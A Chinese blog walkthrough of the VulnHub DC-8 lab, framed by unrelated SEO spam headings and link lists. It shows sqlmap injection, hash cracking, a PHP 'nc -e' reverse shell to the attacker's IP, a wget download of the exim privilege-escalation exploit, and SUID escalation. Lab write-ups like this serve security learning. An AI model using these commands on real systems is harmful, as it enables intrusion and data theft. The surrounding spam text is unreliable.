当前位置: 首页 > news >正文

网站建设中倒计时模板下载网络技术推广服务

网站建设中倒计时模板下载,网络技术推广服务,沁水做网站,一流的商城网站建设文章目录一、环境搭建二、渗透流程三、思路总结一、环境搭建 DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip kali:192.168.144.148 DC-8:192.168.144.156 二、渗透流程 1、信息收集nmap -T5 -A -p- -sV -sT 192.168.144.156思路&am…

文章目录

  • 一、环境搭建
  • 二、渗透流程
  • 三、思路总结


一、环境搭建

DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip
kali:192.168.144.148
DC-8:192.168.144.156


二、渗透流程

1、信息收集

nmap -T5 -A -p- -sV -sT 192.168.144.156

思路:
1、80端口

目录扫描:dirb、gobuster、dirsearch等工具;
web站点资产识别:goby、whatweb等;
web站点功能页面;
分析网页源代码;
……

2、22端口

ssh爆破、有账号密码信息进行远程登录
……


2、sql注入

1.插入'报错,尝试进行sql注入

2.爆数据库:
sqlmap -u "http://192.168.144.156/?nid=1" --dbs

3.爆d7db数据库的表:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db --tables

4.爆users表的列:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' --columns

5,爆users表的字段:
sqlmap -u "http://192.168.144.156/?nid=1" -D d7db -T 'users' -C uid,name,pass --dump

6.将这两个密码保存,使用john进行爆破:获取到账号密码 john:turtle

登录后台地址:
http://192.168.144.156/user/login
在这里插入图片描述


3、获取权限

1.php反弹shell代码

<?php system("nc -e /bin/sh 192.168.144.148 4444");?>

2.利用python切换到bash环境

python -c 'import pty;pty.spawn("/bin/bash")'

4、提权

1.利用find命令查找具有suid的root的文件

find / -perm -4000 -user root 2>/dev/null


2.查看exim具体版本

dpkg -l | grep exim


3.搜索exim 4.89的具体漏洞

searchsploit exim


4.漏洞利用
拷贝46996.sh到桌面

cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh 

在46996.sh内容中添加:set ff=unix,否则会报如下错误:

kali 开启临时HTTP服务器

python -m SimpleHTTPServer

下载shell到/tmp临时文件目录

#下载kali主机46996.sh文件至靶机shell的/tmp目录下
wget http://192.168.144.148:8000/46996.sh
#并赋予权限
chmod 777 46996.sh
./46996.sh -m netcat 

三、思路总结

1、信息收集
2、利用SQL注入获取账号密码
3、登陆后台
4、插入脚本反弹shell
5、exim漏洞
6、SUID提权

参考链接:https://blog.mzfr.me/vulnhub-writeups/2019-09-5-DC8

http://www.zhongyajixie.com/news/29927.html

相关文章:

  • 没网站做cpa青岛seo网络优化公司
  • 怎么在网站上做链接系统优化软件
  • wordpress腾讯云新的seo网站优化排名 网站
  • 专做外贸的网站自助建站系统个人网站
  • 标识设计公司网站seo最新优化技术
  • 杭州网站定制开发电商数据网站
  • 机械网站精选百度搜索排行seo
  • 网上做论文的网站有哪些内容收录批量查询
  • vs做的本地网站seo技术交流
  • 全套网站搭建10条重大新闻
  • wordpress 做购物网站百度竞价app
  • 济南网站建设 行知科技seo排名点击报价
  • 建设网站火车票预订免费创建网站平台
  • dedecms仿下拉菜单网站网络营销工作内容是什么
  • 犬舍网站怎么做六年级上册数学优化设计答案
  • 网络推广公司营销策划seo搜索优化待遇
  • 网站建设 seo优化肇庆seo按天收费
  • 做彩票网站的方案外贸网站推广的方法
  • wordpress换回原版编辑器一键优化免费下载
  • 山西网站建设宁波正规seo推广公司
  • 成都网站建设四川冠辰百度推广销售员的工作内容
  • 怎么做网站动态框友情链接交换网
  • 常德网站建设哪家快今日nba战况
  • 户外媒体网站建设免费竹子建站官网
  • 电子商务网站建设及推广方案论文网络营销与策划试题及答案
  • 企业所得税怎么算例题慧达seo免登录发布
  • app网站开发多少钱小红书软文推广
  • 自助建站免费网站win11优化大师
  • 做网站ui设计多少钱白度指数
  • 阿里云个人怎么免费做网站百度云搜索入口